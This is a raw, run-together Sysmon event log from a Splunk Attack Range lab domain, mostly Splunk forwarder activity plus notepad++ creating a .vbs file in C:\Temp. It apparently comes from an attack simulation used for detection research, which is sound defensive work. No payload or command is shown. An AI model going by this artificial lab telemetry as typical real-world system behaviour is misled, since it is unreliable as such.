Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=820190C255961D6FC715ADD4052D6CCC,SHA256=4CC6D9F9280DAA5A2B3B1731E783145E564534C6881F86EDDE68873C5695FDD3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000107709Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:43.569{58E9C193-AE68-615A-C800-00000000FC01}45484444C:\Windows\Explorer.EXE{58E9C193-B11C-615A-9C01-00000000FC01}5944C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6162f|C:\Windows\System32\SHELL32.dll+62f15|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107708Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:43.569{58E9C193-AE68-615A-C800-00000000FC01}45484444C:\Windows\Explorer.EXE{58E9C193-B11C-615A-9C01-00000000FC01}5944C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+62e2e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107707Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:43.569{58E9C193-AE68-615A-C800-00000000FC01}45484444C:\Windows\Explorer.EXE{58E9C193-B11C-615A-9C01-00000000FC01}5944C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61884|C:\Windows\System32\SHELL32.dll+62df7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107706Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:43.554{58E9C193-AE68-615A-C800-00000000FC01}45485108C:\Windows\Explorer.EXE{58E9C193-B11C-615A-9C01-00000000FC01}5944C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6162f|C:\Windows\System32\SHELL32.dll+62890|C:\Windows\System32\TwinUI.dll+f54e1|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107705Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:43.554{58E9C193-AE68-615A-C800-00000000FC01}45485108C:\Windows\Explorer.EXE{58E9C193-B11C-615A-9C01-00000000FC01}5944C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47bc0|C:\Windows\System32\SHELL32.dll+6284c|C:\Windows\System32\TwinUI.dll+f54e1|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107704Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:43.554{58E9C193-AE68-615A-C800-00000000FC01}45485108C:\Windows\Explorer.EXE{58E9C193-B11C-615A-9C01-00000000FC01}5944C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61884|C:\Windows\System32\SHELL32.dll+62820|C:\Windows\System32\TwinUI.dll+f54e1|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107703Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:43.554{58E9C193-AE68-615A-C800-00000000FC01}45485108C:\Windows\Explorer.EXE{58E9C193-B11C-615A-9C01-00000000FC01}5944C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+f5319|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000107702Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:43.536{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=17C9E67B165554D9C0970269CCD16816,SHA256=E47B07BB1BD2C35E52BF6A27E63CB498C59A330535BF8473756507A36D996D1A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083622Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:43.607{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3322D807D5516DF510865FC914BFD885,SHA256=F7A7F26E8787B1D74B975D4E1CB04A3C15C5D46AF0C258CD833D43445E6D5710,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107710Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:44.553{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=645703B571C4E2BC4B7ADD3498267D7B,SHA256=D6768B479C166CFEFF2F7DA3EFB61B36976F02AC1A839FABB9595FAE44351117,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083623Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:44.638{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F405DAA911C21E2CCE7EF71A2A4EA930,SHA256=BE67B83A1A973785F462E4A1681202E100A36B99086EAC6A5AD4EFF218B28871,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000107712Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:44.428{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local51927-false10.0.1.12-8000- 23542300x8000000000000000107711Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:45.583{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=737DE111965E0EA14C3105F76FBFDFAD,SHA256=F3753C79B534E25E50C8B3272477693F52EA446E355F0DA06089B14CC5FA4DA7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083625Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:45.638{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=47900D0BE09D71D8E374B782E2DAF6C2,SHA256=D3801B87E82DE6D875067ED8004E85B43743F1F88CABE13C37B02E1A148CD2F9,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000083624Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:42.788{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50180-false10.0.1.12-8000- 23542300x800000000000000083626Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:46.763{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7ABAE1AA8EFFDC3118C0D60ECD4C0B56,SHA256=446E892CF8EED009C863C4BBD2B7CA2D99B5F198F3DDEFC874A45BD07CB6F87E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107713Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:46.598{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CC7447159B19B2EBA8B850195F387803,SHA256=4A7C0B60C5CAC450A1315799DB110868BCA7A98A99FCD24D5DA1E9FFB3F775D4,IMPHASH=00000000000000000000000000000000falsetrue 11241100x8000000000000000107716Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:47.897{58E9C193-B11C-615A-9C01-00000000FC01}5944C:\Program Files\Notepad++\notepad++.exeC:\Temp\_______ _____ ___ ______ ______.vbs2021-10-04 07:34:26.000 23542300x8000000000000000107715Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:47.897{58E9C193-B11C-615A-9C01-00000000FC01}5944ATTACKRANGE\AdministratorC:\Program Files\Notepad++\notepad++.exeC:\Temp\_______ _____ ___ ______ ______.vbsMD5=C29778E3F6B2E3EF93316EF23450C027,SHA256=A6569F10F2E4BEC3470B2D5B227061E92AC6F5D5DCA3CE450C15A0F250A9CDAE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107714Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:47.631{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=388BD8EF69F5B95D5A0CDB99642DE3FA,SHA256=921182653CA958AB6F2B2E7E15A65D1790C00A476B5373B7077479C2A8806F77,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083627Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:47.763{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C30B4ABAB747FE5D6D2CD39897045FD4,SHA256=55786275D124795A52168DF72CDE05D269DD0836E1CBB8927BDB973633205FA1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107717Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:48.649{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9E3E9BE7861D14194C2F37179130152A,SHA256=2F58F6879BC365A0083DE7D4C32D6926ADBA71D02F15B87C632CEA6645097BB3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083628Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:48.763{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0906C107DA5EE4DE37989B8833B32054,SHA256=6D07A12A92FDB3D31235B289739F680A8A9A0F6FDF29A7A871B9CC67E6E6F8E5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083629Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:49.794{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FB576E3C5D08500DB8D2669817421895,SHA256=404183A1B1F31704B1BD523A15F10CC7B14D0B6524643013ABAA3CE9BA1C1A4F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107718Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:49.664{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=66AB3FDE5F1F813AC5CBFCA307CA9E57,SHA256=A0AAABB48B06EAD63D00358093535A3B5464E63E717BC14CB8A17282A9CF069A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107719Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:50.679{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7A0A8C0F5B683B6A383FE46852C8EFCD,SHA256=047111073B7DCF028AC69B8D46FD6F02FBB5F7790502C633F382414B8B1F65FB,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000083630Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:48.584{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50181-false10.0.1.12-8000- 354300x8000000000000000107721Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:50.323{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local51928-false10.0.1.12-8000- 23542300x8000000000000000107720Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:51.750{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=233B28A0AE11857952128671A73B4A71,SHA256=02561DFFCCD8B4AAEA132F054BCE7E2225960181B999DA4BF5E1E26A2F0FFC08,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083631Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:51.029{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1EDBAA676F8765246B557C9342B821D0,SHA256=A49344EC9C5377FFDFAE2C2B5017FF6E9F867C08B13091FE0014107830912DEC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107722Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:52.750{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=247D4F5A9E55C8F0C29A93EE18F997D3,SHA256=5E772ACBC32B5E56F8B89AD5D253286BC64294326973273C9441BD67E3C8DC4C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083632Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:52.029{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8E83381E41F81F1F05C3A53567C6AFCD,SHA256=A45BB9D1627D35B37C5F5FB2562805DAB16B47BACC580C4715BDA8140F454122,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107723Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:53.768{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7293C6457483107E9FEAC55CB9D298AD,SHA256=AAE5544E06688B18B97C12615D13BB50F2A9B6E0516DD87F72F2492E524641D8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083633Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:53.044{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D1F73FE54FD32EB5DB91330BB6867C1A,SHA256=B79654951D7BC56AC66CD3AA3B01144A9D0146F69F7084F354FEAF2D97B364CA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107724Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:54.783{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=073C41038B4F17F5201F017B3E9F78FF,SHA256=9E5A86A1DF1894D72F8A5F0CE213352CF2F2DDDAA459389AC16C925991C7341F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083634Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:54.216{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EFBB0D708C1D2AABC358FCCFE00E7CF1,SHA256=B7D065607BCEDC80A8477C7C6493BF02A19F980316AF47C7CCC6F64C7EA33D47,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107725Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:55.797{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1F8E328C3A522C6A6B391673D609FB31,SHA256=0589A752EA7D28C45476C1EE557508C864D8235D8E18B0A4AC25413D55AB4776,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000083636Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:53.741{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50182-false10.0.1.12-8000- 23542300x800000000000000083635Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:55.232{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=42BB826F506197C3377F5394EBC56FC0,SHA256=2D4F9842C5038E2DA8DC66935443E1243865B88522F99F808571C91341F16B00,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107727Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:56.812{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=771A9B71765FBFB5C3C653E0556141C5,SHA256=E29FF2002EA74BB88AE8A574955E42F071313FAC098DC28B775CF1042D47BC81,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083637Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:56.310{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=31FAD3E4276F26DE80629A4D3E8D93CC,SHA256=F132BE56CEAF852BF444E4113B2B78CD327103BC1766B58A079B5933343436A8,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000107726Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:55.442{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local51929-false10.0.1.12-8000- 23542300x8000000000000000107730Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:57.880{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DE37E48ACF4FAA7DE93DB839325411B7,SHA256=C32326458A5C15F9454F0B79C4F9551DFA16FD25C4C6DE870FD789504B6780AB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083638Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:57.339{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=19B090CA23248B34CA06B3665D03AD68,SHA256=93A2C4A29D808087D7A649A0BD542CB62804999F60CAF63A6C701F49C2DE4716,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107729Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:57.081{58E9C193-B11C-615A-9C01-00000000FC01}5944ATTACKRANGE\AdministratorC:\Program Files\Notepad++\notepad++.exeC:\Users\Administrator\AppData\Roaming\Notepad++\session.xmlMD5=FAD93BB7C646F016C161DDA5F96417DF,SHA256=F86FEF57010DAC6234C0CA2EDCC1CB2F864773733947DF2BEDD46365DF4B57CD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107728Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:57.049{58E9C193-ACB4-615A-2F00-00000000FC01}1712NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=0DE8A333C5FD1740BE6882387E7A5A2B,SHA256=A5B175F730F9666E64AD37BBFDA51EEEB5E907D1D3D0F46F0AAC40581BD0C903,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107740Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:58.895{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C2E41A886814C30A45ADE90A53285F8E,SHA256=5AE227F993E39A4906FFEC7612EDE9101961C391E5053A860AB90134E53CF3C9,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000083652Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:58.870{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B532-615A-9C01-00000000FD01}1868C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083651Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 